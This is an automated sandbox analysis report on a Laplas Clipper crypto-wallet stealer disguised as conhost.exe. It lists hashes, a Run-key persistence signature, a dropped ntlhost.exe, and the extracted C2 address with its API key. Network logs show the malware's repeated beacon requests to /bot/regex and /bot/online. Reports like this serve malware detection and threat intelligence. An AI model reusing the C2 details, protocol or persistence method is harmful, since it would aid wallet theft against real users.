Analysis

  • max time kernel
    135s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-05-2023 15:29

General

  • Target

    conhost.exe

  • Size

    4.0MB

  • MD5

    feccda803ece2e7a3b7e9798714ad47e

  • SHA1

    e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

  • SHA256

    14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

  • SHA512

    dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

  • SSDEEP

    49152:jEjwvlIKv05z+UERnIcYmWjc3Cdh+5E9UFiqeb0/B1:RlhWzZ6hjEciqe

Malware Config

Extracted

Family

laplas

C2

http://185.223.93.251

Attributes
  • api_key

    f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Executes dropped EXE
      PID:536

Network

  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:29:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:29:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:30:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:30:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:31:53 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:31:53 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    251.93.223.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    251.93.223.185.in-addr.arpa
    IN PTR
    Response
    251.93.223.185.in-addr.arpa
    IN PTR
    customerclientshostnamecom
  • flag-us
    DNS
    86.8.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.8.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • 93.184.221.240:80
    260 B
    5
  • 93.184.221.240:80
    322 B
    7
  • 185.223.93.251:80
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
    http
    ntlhost.exe
    1.6kB
    3.7kB
    15
    17

    HTTP Request

    GET http://185.223.93.251/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin

    HTTP Response

    200
  • 40.125.122.176:443
    260 B
    5
  • 13.69.109.131:443
    322 B
    7
  • 173.223.113.164:443
    322 B
    7
  • 173.223.113.131:80
    322 B
    7
  • 40.125.122.176:443
    260 B
    5
  • 40.125.122.176:443
    260 B
    5
  • 93.184.221.240:80
    322 B
    7
  • 40.125.122.176:443
    260 B
    5
  • 40.125.122.176:443
    260 B
    5
  • 40.125.122.176:443
    260 B
    5
  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    251.93.223.185.in-addr.arpa
    dns
    73 B
    115 B
    1
    1

    DNS Request

    251.93.223.185.in-addr.arpa

  • 8.8.8.8:53
    86.8.109.52.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    86.8.109.52.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    384.8MB

    MD5

    59e30a386a548161ffb85ce155376f69

    SHA1

    953b85e50bfde88e1c3309a0cb49e86e1a78b13a

    SHA256

    2c4651ef6233e71269286dad60dd3fdae2d48d18080f8d65227c438a7f5d381f

    SHA512

    7278dd127883e1b7fa167a92b50becd4ab29e5098b03ea95740710302457a61c05ebf7347610ef12cca79fd3723602f7977aa8919de25f33f06212e6b4fce2fd

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    381.7MB

    MD5

    a43f106734e07aaf60929de2f6a7a308

    SHA1

    f7ece4e6e6cd7fc1f4a6432493789bbb5a6abb1e

    SHA256

    aa9c6c193aa0c6fd91492db278475f1400f876ccc8cbcefc18e0b3a522faeffd

    SHA512

    1109434606fda21698a28bd793a18bd2f4b8b42aa44f7ad54234b9043e4b8272584bb3cd53ef97a9a9f8d9159d797a4fae6babfb1bb1b6560210e57f95e1313f

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.